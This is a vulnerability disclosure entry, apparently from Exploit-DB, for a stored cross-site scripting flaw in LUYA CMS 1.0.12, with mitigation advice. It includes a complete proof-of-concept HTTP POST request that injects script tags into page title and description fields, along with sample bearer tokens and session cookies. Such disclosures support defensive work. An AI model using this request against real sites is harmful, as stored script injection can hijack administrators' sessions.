LUYA CMS 1.0.12 - Cross-Site Scripting

vendor:

LUYA CMS

by:

Ismail Tasdelen

8.8

CVSS

HIGH

Cross-site Scripting

CWE

Product Name: LUYA CMS

Affected Version From: 1.0.12

Affected Version To: 1.0.12

Patch Exists: NO

Related CWE: N/A

CPE: a:luyadev:luya:1.0.12

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

LUYA CMS 1.0.12 – Cross-Site Scripting

LUYA CMS version 1.0.12 is vulnerable to stored cross-site scripting. An attacker can send a malicious POST request to the '/admin/api-cms-nav/create-page' endpoint with a crafted payload in the 'title', 'description', and 'keywords' parameters to execute arbitrary JavaScript code in the victim's browser.

Mitigation:

Input validation should be used to prevent malicious code from being stored in the database. Additionally, output encoding should be used to prevent malicious code from being executed in the browser.

Source

Exploit-DB raw data:

# Exploit Title: LUYA CMS 1.0.12 - Cross-Site Scripting
# Date: 2018-10-11 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://luya.io/
# Software Link : https://github.com/luyadev/luya/
# Software : LUYA CMS
# Version : 1.0.12
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : N/A

# HTTP POST Request :
 
POST /admin/api-cms-nav/create-page HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/en/admin
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Authorization: Bearer 53431c6c5c751d6655966396667a70cbf483bc2869ce1b45cecb5be8983d6fa08o5E7gSdThq_KprALbv_-r496se-lhLi
X-CSRF-Token: vHqCboMdLTmKiufTdIrCcdmFAhmahRSLihW4CuJKQprpGNID4nZPd8njkYkO7Igpi-RFKfDgf8LTcOp4mhB34A==
Content-Length: 295
Cookie: _pk_id.1.2c3a=0f1464d36bad1760.1539204750.1.1539204750.1539204750.; _pk_ref.1.2c3a=%5B%22%22%2C%22%22%2C1539204750%2C%22https%3A%2F%2Fwww.google.com%2F%22%5D; PHPSESSID=pm9625erik3t3ddkqmql8nb0u1; _csrf_admin=b5e1f46c449881bd2d16dd32fcd2d2e02579c1a19bc7e233396e4bac99665c23a%3A2%3A%7Bi%3A0%3Bs%3A11%3A%22_csrf_admin%22%3Bi%3A1%3Bs%3A32%3A%22DxmjAB6ItiORW07BdnHjOXGhutdrmcx_%22%3B%7D
Connection: close

isInline=false&nav_item_type=1&parent_nav_id=0&is_draft=0&nav_container_id=1&lang_id=1&use_draft=0&layout_id=2&from_draft_id=0&title=%22%3E%3Cscript%3Ealert(%22Ismail%20Tasdelen%22)%3C%2Fscript%3E&alias=url-address-test&description=%22%3E%3Cscript%3Ealert(%22Ismail%20Tasdelen%22)%3C%2Fscript%3E